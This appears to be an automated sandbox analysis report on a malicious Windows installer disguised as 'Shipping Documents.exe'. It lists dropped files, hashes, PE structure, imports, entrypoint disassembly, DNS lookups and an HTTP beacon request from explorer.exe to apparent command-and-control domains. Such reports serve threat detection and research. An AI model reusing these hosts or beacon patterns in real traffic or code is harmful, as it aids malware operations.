                                        Preview: A.[.3..*.Q....{..sN...'<..ONeo..bLU...m ...7pl..6.BW.}.HX.K.0...._V...A..8..?.r....!....v..V.'.nY.z.T?..8..l.>o..aF.....4...h.i2.m3.j....<^..6.u...i.....:.....P.=..<*..K;S.....9.G.;3.9.d......F...#bW.O..;i.D.....Yq.}...G.D8...$NV.....RO.c....'...(.7.M.9|.......S.l<.d.w.$B...$a2..D0J$._O?....2O!.}.......U...4...9..2(.{Y1.=..v.#iK..V..O....,..K..k..../..)i.....1..y.."...t`sj......>.Q.%f3~.U.W...$..KsUT.....B.Q............V.....[.o]...l.Z...&....=.b(1.....XE.D....^...?rP..(.....jJ+. G%P/{.6..F.....T.;um%..zX~..........ZQ)..3W... ..;.....W.m.FZ.P.r.Wc.$..J....J..)u..N*..e..^.~od^.\h.;....N+.<2.<'..E.Y.....1....T..>k.:{..#.S{.$b_.....}..^zD.l.\9.O..x.rr..\8.s?3.-.-....ge.=......$....1......"#.9.Y..).L.U.N..]..C....{..N.....[...'!...B.bp.k...q.P. .0h...Q.d....%....Z.R?D.....Z(,...~.I.`......J...".....f+.bZ>,.-.........^.\...r&.....L.|N..%....4&V:..U.].eK..D-.vq.N%x')>(@..Y.......A.....X/.. .Y/.Y..*E...T.x.`.....j..pt.T....6..".1V...g..q.=.Y.
                                        C:\Users\user\AppData\Local\Temp\nseCE57.tmp
                                        Process:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        File Type:data
                                        Category:dropped
                                        Size (bytes):202809
                                        Entropy (8bit):7.951227965199436
                                        Encrypted:false
                                        SSDEEP:6144:ErIr6CM/yUkQX8SMoPf83Z0fG4qif0/pb:OIrs/yU/8SLn83afJdfepb
                                        MD5:EEC68D9A616CC886AE38B3F03FD9BF89
                                        SHA1:7CC6FEA48F92829BC72B6CB9C235D1342EBDC92C
                                        SHA-256:2269443BC541DD17909DA43985E6C73D332A4B89B8771F3A09276E16F0A449B5
                                        SHA-512:E4E79ACDBC1501412F894851E686C31D23B703164102D34938709F78D7590DC5A6063381F86714B695CBE4DF3CF43A4765ED6BCEEB6D36F233A8BA58207891AF
                                        Malicious:false
                                        Reputation:low
                                        Preview: $.......,...............................>.......$...........................................................................................................................................................................................................................................J...................g...............................................................j.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                        C:\Users\user\AppData\Local\Temp\nszCE87.tmp\22m80anrrsp.dll
                                        Process:C:\Users\user\Desktop\202139769574 Shipping Documents.exe
                                        File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                        Category:dropped
                                        Size (bytes):6144
                                        Entropy (8bit):4.592177790604414
                                        Encrypted:false
                                        SSDEEP:96:rcgn1ASkfNDZ+t8oFmfRYB0tGL+l6gUVklwLz2ub29+3EQs:wnmlLa6gWCki99+3EQ
                                        MD5:A91A7F4F897A9E713B5773E389980197
                                        SHA1:7B8BF8B09702848EF1E3FB0CFD8FA94FBF92FFC3
                                        SHA-256:E74DA3284780511C44E53FC952A7DFE12578DDCB37C3BCFF43C1C45D5A427B0A
                                        SHA-512:883A8957A712B3A83C90555B19CB71BD49EAD9B8B042FF18515007B3A081208F7E1AF38D56BDC0610D5A7F8D7758FF1DC3A8264E20DCF2E294CF852BB604B9DF
                                        Malicious:false
                                        Reputation:low
                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................C1...........;.....;.....;.....Rich...........PE..L...T..`...........!......................... ...............................@.......................................!..P...$#......................................0!..............................P!..@............ ...............................text...p........................... ..`.rdata....... ......................@..@.data...L....0......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................................

                                        Static File Info

                                        General

                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                        Entropy (8bit):7.8990267345678715
                                        TrID:
                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                        • DOS Executable Generic (2002/1) 0.02%
                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                        File name:202139769574 Shipping Documents.exe
                                        File size:235115
                                        MD5:eee5f618718bc8237bb9c7a48154cf1a
                                        SHA1:84dc873f65dc9e86978944d1adddb762efcf2631
                                        SHA256:cc7b066e0fa912d406c27790458ad6feb171b27275b6e3fe46b7a7574da7bfce
                                        SHA512:8f49fab9642c63814bc77ff302d05719d92404fe38bd220060a161c51b3f6f129bd5c4b2a4b3a2e1e239488e31f157f32b772505f8501003682cc9904d205c57
                                        SSDEEP:6144:lPXIfOtwEmM2jSvr02vaoMrgkoHYltLEZZLMZU7J:aW2Ar0Esrbo4H0MZ+
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1)..PG..PG..PG.*_...PG..PF.IPG.*_...PG..sw..PG..VA..PG.Rich.PG.........PE..L.....$_.................d..........a4............@

                                        File Icon

                                        Icon Hash:b2a88c96b2ca6a72

                                        Static PE Info

                                        General

                                        Entrypoint:0x403461
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                        DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp:0x5F24D6E4 [Sat Aug 1 02:43:48 2020 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:ea4e67a31ace1a72683a99b80cf37830

                                        Entrypoint Preview

                                        Instruction
                                        sub esp, 00000184h
                                        push ebx
                                        push esi
                                        push edi
                                        xor ebx, ebx
                                        push 00008001h
                                        mov dword ptr [esp+18h], ebx
                                        mov dword ptr [esp+10h], 0040A130h
                                        mov dword ptr [esp+20h], ebx
                                        mov byte ptr [esp+14h], 00000020h
                                        call dword ptr [004080B0h]
                                        call dword ptr [004080C0h]
                                        and eax, BFFFFFFFh
                                        cmp ax, 00000006h
                                        mov dword ptr [0042474Ch], eax
                                        je 00007F291CB83933h
                                        push ebx
                                        call 00007F291CB86AAEh
                                        cmp eax, ebx
                                        je 00007F291CB83929h
                                        push 00000C00h
                                        call eax
                                        mov esi, 004082A0h
                                        push esi
                                        call 00007F291CB86A2Ah
                                        push esi
                                        call dword ptr [004080B8h]
                                        lea esi, dword ptr [esi+eax+01h]
                                        cmp byte ptr [esi], bl
                                        jne 00007F291CB8390Dh
                                        push 0000000Bh
                                        call 00007F291CB86A82h
                                        push 00000009h
                                        call 00007F291CB86A7Bh
                                        push 00000007h
                                        mov dword ptr [00424744h], eax
                                        call 00007F291CB86A6Fh
                                        cmp eax, ebx
                                        je 00007F291CB83931h
                                        push 0000001Eh
                                        call eax
                                        test eax, eax
                                        je 00007F291CB83929h
                                        or byte ptr [0042474Fh], 00000040h
                                        push ebp
                                        call dword ptr [00408038h]
                                        push ebx
                                        call dword ptr [00408288h]
                                        mov dword ptr [00424818h], eax
                                        push ebx
                                        lea eax, dword ptr [esp+38h]
                                        push 00000160h
                                        push eax
                                        push ebx
                                        push 0041FD10h
                                        call dword ptr [0040816Ch]
                                        push 0040A1ECh

                                        Rich Headers

                                        Programming Language:
                                        • [EXP] VC++ 6.0 SP5 build 8804

                                        Data Directories

                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x84380xa0.rdata
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x2d0000xbc8.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x80000x29c.rdata
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                        Sections

                                        NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x10000x623c0x6400False0.65859375data6.40257705324IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rdata0x80000x12740x1400False0.43359375data5.05749598324IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .data0xa0000x1a8580x600False0.445963541667data4.08975001509IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                        .ndata0x250000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .rsrc0x2d0000xbc80xc00False0.435546875data4.46172201417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                        Resources

                                        NameRVASizeTypeLanguageCountry
                                        RT_ICON0x2d1c00x2e8dataEnglishUnited States
                                        RT_DIALOG0x2d4a80x144dataEnglishUnited States
                                        RT_DIALOG0x2d5f00x100dataEnglishUnited States
                                        RT_DIALOG0x2d6f00x11cdataEnglishUnited States
                                        RT_DIALOG0x2d8100x60dataEnglishUnited States
                                        RT_GROUP_ICON0x2d8700x14dataEnglishUnited States
                                        RT_MANIFEST0x2d8880x340XML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                        Imports

                                        DLLImport
                                        ADVAPI32.dllRegCreateKeyExA, RegEnumKeyA, RegQueryValueExA, RegSetValueExA, RegCloseKey, RegDeleteValueA, RegDeleteKeyA, AdjustTokenPrivileges, LookupPrivilegeValueA, OpenProcessToken, SetFileSecurityA, RegOpenKeyExA, RegEnumValueA
                                        SHELL32.dllSHGetFileInfoA, SHFileOperationA, SHGetPathFromIDListA, ShellExecuteExA, SHGetSpecialFolderLocation, SHBrowseForFolderA
                                        ole32.dllIIDFromString, OleInitialize, OleUninitialize, CoCreateInstance, CoTaskMemFree
                                        COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
                                        USER32.dllSetClipboardData, CharPrevA, CallWindowProcA, PeekMessageA, DispatchMessageA, MessageBoxIndirectA, GetDlgItemTextA, SetDlgItemTextA, GetSystemMetrics, CreatePopupMenu, AppendMenuA, TrackPopupMenu, FillRect, EmptyClipboard, LoadCursorA, GetMessagePos, CheckDlgButton, GetSysColor, SetCursor, GetWindowLongA, SetClassLongA, SetWindowPos, IsWindowEnabled, GetWindowRect, GetSystemMenu, EnableMenuItem, RegisterClassA, ScreenToClient, EndDialog, GetClassInfoA, SystemParametersInfoA, CreateWindowExA, ExitWindowsEx, DialogBoxParamA, CharNextA, SetTimer, DestroyWindow, CreateDialogParamA, SetForegroundWindow, SetWindowTextA, PostQuitMessage, SendMessageTimeoutA, ShowWindow, wsprintfA, GetDlgItem, FindWindowExA, IsWindow, GetDC, SetWindowLongA, LoadImageA, InvalidateRect, ReleaseDC, EnableWindow, BeginPaint, SendMessageA, DefWindowProcA, DrawTextA, GetClientRect, EndPaint, IsWindowVisible, CloseClipboard, OpenClipboard
                                        GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectA, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
                                        KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetProcAddress, GetSystemDirectoryA, WideCharToMultiByte, MoveFileExA, GetTempFileNameA, RemoveDirectoryA, WriteFile, CreateDirectoryA, GetLastError, CreateProcessA, GlobalLock, GlobalUnlock, CreateThread, lstrcpynA, SetErrorMode, GetDiskFreeSpaceA, lstrlenA, GetCommandLineA, GetVersion, GetWindowsDirectoryA, SetEnvironmentVariableA, GetTempPathA, CopyFileA, GetCurrentProcess, ExitProcess, GetModuleFileNameA, GetFileSize, ReadFile, GetTickCount, Sleep, CreateFileA, GetFileAttributesA, SetCurrentDirectoryA, SetFileAttributesA, GetFullPathNameA, GetShortPathNameA, MoveFileA, CompareFileTime, SetFileTime, SearchPathA, lstrcmpiA, lstrcmpA, CloseHandle, GlobalFree, GlobalAlloc, ExpandEnvironmentStringsA, LoadLibraryExA, FreeLibrary, lstrcpyA, lstrcatA, FindClose, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, SetFilePointer, GetModuleHandleA, FindNextFileA, FindFirstFileA, DeleteFileA, MulDiv

                                        Possible Origin

                                        Language of compilation systemCountry where language is spokenMap
                                        EnglishUnited States

                                        Network Behavior

                                        Snort IDS Alerts

                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                        05/04/21-07:04:44.374290TCP1201ATTACK-RESPONSES 403 Forbidden804975423.227.38.74192.168.2.4

                                        Network Port Distribution

                                        TCP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 4, 2021 07:04:44.156946898 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.200963020 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.201138973 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.201277971 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.242088079 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374289989 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374347925 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374392033 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374419928 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374439001 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374450922 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374499083 CEST804975423.227.38.74192.168.2.4
                                        May 4, 2021 07:04:44.374547958 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.374583960 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.374627113 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:04:44.374713898 CEST4975480192.168.2.423.227.38.74
                                        May 4, 2021 07:05:04.632004976 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.802618980 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.802793026 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.803034067 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.973489046 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979024887 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979042053 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979053020 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979098082 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979115963 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979126930 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979140043 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979151964 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979167938 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979185104 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:04.979249001 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.979291916 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:04.979320049 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:05.149884939 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149898052 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149910927 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149943113 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149954081 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149971962 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.149986029 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:05.149990082 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.150005102 CEST8049768198.185.159.144192.168.2.4
                                        May 4, 2021 07:05:05.150032043 CEST4976880192.168.2.4198.185.159.144
                                        May 4, 2021 07:05:05.150060892 CEST4976880192.168.2.4198.185.159.144

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        May 4, 2021 07:03:04.079806089 CEST5372353192.168.2.48.8.8.8
                                        May 4, 2021 07:03:04.128549099 CEST53537238.8.8.8192.168.2.4
                                        May 4, 2021 07:03:04.402079105 CEST6464653192.168.2.48.8.8.8
                                        May 4, 2021 07:03:04.451792002 CEST53646468.8.8.8192.168.2.4
                                        May 4, 2021 07:03:04.625377893 CEST6529853192.168.2.48.8.8.8
                                        May 4, 2021 07:03:04.682780027 CEST53652988.8.8.8192.168.2.4
                                        May 4, 2021 07:03:09.192593098 CEST5912353192.168.2.48.8.8.8
                                        May 4, 2021 07:03:09.244214058 CEST53591238.8.8.8192.168.2.4
                                        May 4, 2021 07:03:10.528140068 CEST5453153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:10.585149050 CEST53545318.8.8.8192.168.2.4
                                        May 4, 2021 07:03:12.016319990 CEST4971453192.168.2.48.8.8.8
                                        May 4, 2021 07:03:12.065512896 CEST53497148.8.8.8192.168.2.4
                                        May 4, 2021 07:03:13.324980021 CEST5802853192.168.2.48.8.8.8
                                        May 4, 2021 07:03:13.373613119 CEST53580288.8.8.8192.168.2.4
                                        May 4, 2021 07:03:14.347913027 CEST5309753192.168.2.48.8.8.8
                                        May 4, 2021 07:03:14.398215055 CEST53530978.8.8.8192.168.2.4
                                        May 4, 2021 07:03:15.327704906 CEST4925753192.168.2.48.8.8.8
                                        May 4, 2021 07:03:15.376349926 CEST53492578.8.8.8192.168.2.4
                                        May 4, 2021 07:03:18.472831964 CEST6238953192.168.2.48.8.8.8
                                        May 4, 2021 07:03:18.521564007 CEST53623898.8.8.8192.168.2.4
                                        May 4, 2021 07:03:18.886133909 CEST4991053192.168.2.48.8.8.8
                                        May 4, 2021 07:03:18.950181007 CEST53499108.8.8.8192.168.2.4
                                        May 4, 2021 07:03:19.645800114 CEST5585453192.168.2.48.8.8.8
                                        May 4, 2021 07:03:19.705853939 CEST53558548.8.8.8192.168.2.4
                                        May 4, 2021 07:03:20.693160057 CEST6454953192.168.2.48.8.8.8
                                        May 4, 2021 07:03:20.744755983 CEST53645498.8.8.8192.168.2.4
                                        May 4, 2021 07:03:21.635854959 CEST6315353192.168.2.48.8.8.8
                                        May 4, 2021 07:03:21.684545994 CEST53631538.8.8.8192.168.2.4
                                        May 4, 2021 07:03:22.595444918 CEST5299153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:22.647067070 CEST53529918.8.8.8192.168.2.4
                                        May 4, 2021 07:03:23.611274958 CEST5370053192.168.2.48.8.8.8
                                        May 4, 2021 07:03:23.660603046 CEST53537008.8.8.8192.168.2.4
                                        May 4, 2021 07:03:24.855562925 CEST5172653192.168.2.48.8.8.8
                                        May 4, 2021 07:03:24.909923077 CEST53517268.8.8.8192.168.2.4
                                        May 4, 2021 07:03:26.444029093 CEST5679453192.168.2.48.8.8.8
                                        May 4, 2021 07:03:26.500868082 CEST53567948.8.8.8192.168.2.4
                                        May 4, 2021 07:03:29.521269083 CEST5653453192.168.2.48.8.8.8
                                        May 4, 2021 07:03:29.571320057 CEST53565348.8.8.8192.168.2.4
                                        May 4, 2021 07:03:30.757359028 CEST5662753192.168.2.48.8.8.8
                                        May 4, 2021 07:03:30.817164898 CEST53566278.8.8.8192.168.2.4
                                        May 4, 2021 07:03:31.698815107 CEST5662153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:31.747591972 CEST53566218.8.8.8192.168.2.4
                                        May 4, 2021 07:03:32.627163887 CEST6311653192.168.2.48.8.8.8
                                        May 4, 2021 07:03:32.676263094 CEST53631168.8.8.8192.168.2.4
                                        May 4, 2021 07:03:34.472414017 CEST6407853192.168.2.48.8.8.8
                                        May 4, 2021 07:03:34.522587061 CEST53640788.8.8.8192.168.2.4
                                        May 4, 2021 07:03:35.616674900 CEST6480153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:35.666146040 CEST53648018.8.8.8192.168.2.4
                                        May 4, 2021 07:03:36.767832041 CEST6172153192.168.2.48.8.8.8
                                        May 4, 2021 07:03:36.816679955 CEST53617218.8.8.8192.168.2.4
                                        May 4, 2021 07:03:43.253061056 CEST5125553192.168.2.48.8.8.8
                                        May 4, 2021 07:03:43.305869102 CEST53512558.8.8.8192.168.2.4
                                        May 4, 2021 07:03:49.856846094 CEST6152253192.168.2.48.8.8.8
                                        May 4, 2021 07:03:49.917939901 CEST53615228.8.8.8192.168.2.4
                                        May 4, 2021 07:04:00.702004910 CEST5233753192.168.2.48.8.8.8
                                        May 4, 2021 07:04:00.760590076 CEST53523378.8.8.8192.168.2.4
                                        May 4, 2021 07:04:18.112989902 CEST5504653192.168.2.48.8.8.8
                                        May 4, 2021 07:04:18.163423061 CEST53550468.8.8.8192.168.2.4
                                        May 4, 2021 07:04:21.772597075 CEST4961253192.168.2.48.8.8.8
                                        May 4, 2021 07:04:21.849781990 CEST53496128.8.8.8192.168.2.4
                                        May 4, 2021 07:04:24.722948074 CEST4928553192.168.2.48.8.8.8
                                        May 4, 2021 07:04:24.786619902 CEST53492858.8.8.8192.168.2.4
                                        May 4, 2021 07:04:44.075501919 CEST5060153192.168.2.48.8.8.8
                                        May 4, 2021 07:04:44.139606953 CEST53506018.8.8.8192.168.2.4
                                        May 4, 2021 07:04:45.625130892 CEST6087553192.168.2.48.8.8.8
                                        May 4, 2021 07:04:45.676755905 CEST53608758.8.8.8192.168.2.4
                                        May 4, 2021 07:04:46.303735018 CEST5644853192.168.2.48.8.8.8
                                        May 4, 2021 07:04:46.360747099 CEST53564488.8.8.8192.168.2.4
                                        May 4, 2021 07:04:46.929398060 CEST5917253192.168.2.48.8.8.8
                                        May 4, 2021 07:04:46.977905035 CEST53591728.8.8.8192.168.2.4
                                        May 4, 2021 07:04:47.406775951 CEST6242053192.168.2.48.8.8.8
                                        May 4, 2021 07:04:47.455522060 CEST53624208.8.8.8192.168.2.4
                                        May 4, 2021 07:04:47.511563063 CEST6057953192.168.2.48.8.8.8
                                        May 4, 2021 07:04:47.568937063 CEST53605798.8.8.8192.168.2.4
                                        May 4, 2021 07:04:48.044918060 CEST5018353192.168.2.48.8.8.8
                                        May 4, 2021 07:04:48.104701042 CEST53501838.8.8.8192.168.2.4
                                        May 4, 2021 07:04:48.713677883 CEST6153153192.168.2.48.8.8.8
                                        May 4, 2021 07:04:48.770565033 CEST53615318.8.8.8192.168.2.4
                                        May 4, 2021 07:04:49.241159916 CEST4922853192.168.2.48.8.8.8
                                        May 4, 2021 07:04:49.298403978 CEST53492288.8.8.8192.168.2.4
                                        May 4, 2021 07:04:50.088316917 CEST5979453192.168.2.48.8.8.8
                                        May 4, 2021 07:04:50.137880087 CEST53597948.8.8.8192.168.2.4
                                        May 4, 2021 07:04:51.005819082 CEST5591653192.168.2.48.8.8.8
                                        May 4, 2021 07:04:51.073479891 CEST53559168.8.8.8192.168.2.4
                                        May 4, 2021 07:04:51.560627937 CEST5275253192.168.2.48.8.8.8
                                        May 4, 2021 07:04:51.617695093 CEST53527528.8.8.8192.168.2.4
                                        May 4, 2021 07:05:01.171524048 CEST6054253192.168.2.48.8.8.8
                                        May 4, 2021 07:05:01.223176003 CEST53605428.8.8.8192.168.2.4
                                        May 4, 2021 07:05:02.719784975 CEST6068953192.168.2.48.8.8.8
                                        May 4, 2021 07:05:02.789992094 CEST53606898.8.8.8192.168.2.4
                                        May 4, 2021 07:05:04.566591024 CEST6420653192.168.2.48.8.8.8
                                        May 4, 2021 07:05:04.631026030 CEST53642068.8.8.8192.168.2.4

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                        May 4, 2021 07:04:21.772597075 CEST192.168.2.48.8.8.80x430fStandard query (0)www.magnumopuspro.comA (IP address)IN (0x0001)
                                        May 4, 2021 07:04:44.075501919 CEST192.168.2.48.8.8.80x9a0fStandard query (0)www.maluss.comA (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.566591024 CEST192.168.2.48.8.8.80x7689Standard query (0)www.exclusiveflooringcollection.comA (IP address)IN (0x0001)

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                        May 4, 2021 07:04:21.849781990 CEST8.8.8.8192.168.2.40x430fName error (3)www.magnumopuspro.comnonenoneA (IP address)IN (0x0001)
                                        May 4, 2021 07:04:44.139606953 CEST8.8.8.8192.168.2.40x9a0fNo error (0)www.maluss.comlightcollect.myshopify.comCNAME (Canonical name)IN (0x0001)
                                        May 4, 2021 07:04:44.139606953 CEST8.8.8.8192.168.2.40x9a0fNo error (0)lightcollect.myshopify.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)
                                        May 4, 2021 07:04:44.139606953 CEST8.8.8.8192.168.2.40x9a0fNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)www.exclusiveflooringcollection.comext-sq.squarespace.comCNAME (Canonical name)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)ext-sq.squarespace.com198.185.159.144A (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)ext-sq.squarespace.com198.49.23.145A (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)ext-sq.squarespace.com198.185.159.145A (IP address)IN (0x0001)
                                        May 4, 2021 07:05:04.631026030 CEST8.8.8.8192.168.2.40x7689No error (0)ext-sq.squarespace.com198.49.23.144A (IP address)IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.maluss.com
                                        • www.exclusiveflooringcollection.com

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                        0192.168.2.44975423.227.38.7480C:\Windows\explorer.exe
                                        TimestampkBytes transferredDirectionData
                                        May 4, 2021 07:04:44.201277971 CEST6365OUTGET /nyr/?tVZl=MKniHD/KKNZ944A0QkseLq559MRPs5jQaAqVav9SZ3PAwf03LQBPNZ+ImXhjCplVxvzR&U4kp=NtxHhLZ8S6kT5jw HTTP/1.1
                                        Host: www.maluss.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        May 4, 2021 07:04:44.374289989 CEST6367INHTTP/1.1 403 Forbidden
                                        Date: Tue, 04 May 2021 05:04:44 GMT
                                        Content-Type: text/html
                                        Transfer-Encoding: chunked
                                        Connection: close
                                        Vary: Accept-Encoding
                                        X-Sorting-Hat-PodId: 161
                                        X-Sorting-Hat-ShopId: 45740490914
                                        X-Dc: gcp-us-central1
                                        X-Request-ID: 0046b1ca-de3c-4bc2-af9b-2bb790ee44c9
                                        X-XSS-Protection: 1; mode=block
                                        X-Download-Options: noopen
                                        X-Content-Type-Options: nosniff
                                        X-Permitted-Cross-Domain-Policies: none
                                        CF-Cache-Status: DYNAMIC
                                        cf-request-id: 09d75cbaca00000614e9283000000001
                                        Server: cloudflare
                                        CF-RAY: 649f30a47de50614-FRA
                                        alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400
